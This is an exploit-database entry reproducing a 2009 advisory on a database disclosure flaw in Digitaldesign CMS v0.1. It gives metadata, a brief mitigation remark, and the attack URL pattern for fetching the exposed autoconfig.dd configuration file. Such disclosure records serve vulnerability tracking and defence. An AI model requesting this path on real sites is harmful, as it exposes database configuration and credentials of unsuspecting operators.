header-logo
Suggest Exploit
vendor:
Digitaldesign CMS
by:
darkjoker
5.5
CVSS
MEDIUM
Database Disclosure
200
CWE
Product Name: Digitaldesign CMS
Affected Version From: Digitaldesign CMS v0.1
Affected Version To: Digitaldesign CMS v0.1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2009

Digitaldesign CMS v0.1 Database Disclosure Vulnerability

The exploit allows an attacker to disclose the database of Digitaldesign CMS v0.1. The vulnerability is due to the presence of an exposed autoconfig.dd file.

Mitigation:

The vendor should release a patch to secure the autoconfig.dd file and prevent unauthorized access to the database.
Source

Exploit-DB raw data:

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
-           __           __     _       __                -
+      ____/ /___ ______/ /__  (_)___  / /_____  _____    +
-     / __  / __ `/ ___/ //_/ / / __ \/ //_/ _ \/ ___/    -
+    / /_/ / /_/ / /  / ,<   / / /_/ / ,< /  __/ /        +
-    \__,_/\__,_/_/  /_/|_|_/ /\____/_/|_|\___/_/         -
+                        /___/                            +
-                                                         -
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+


Digitaldesign CMS v0.1 Database Disclosure Vulnerability

[+] Author  : darkjoker
[+] Site    : http://darkjoker.net23.net
[+] Download: http://sourceforge.net/projects/ddcms/

[+] URL     : http://[hostname]/[CMS path]/autoconfig.dd
[+] Ex.     : http://localhost/ddcms/autoconfig.dd

# milw0rm.com [2009-07-10]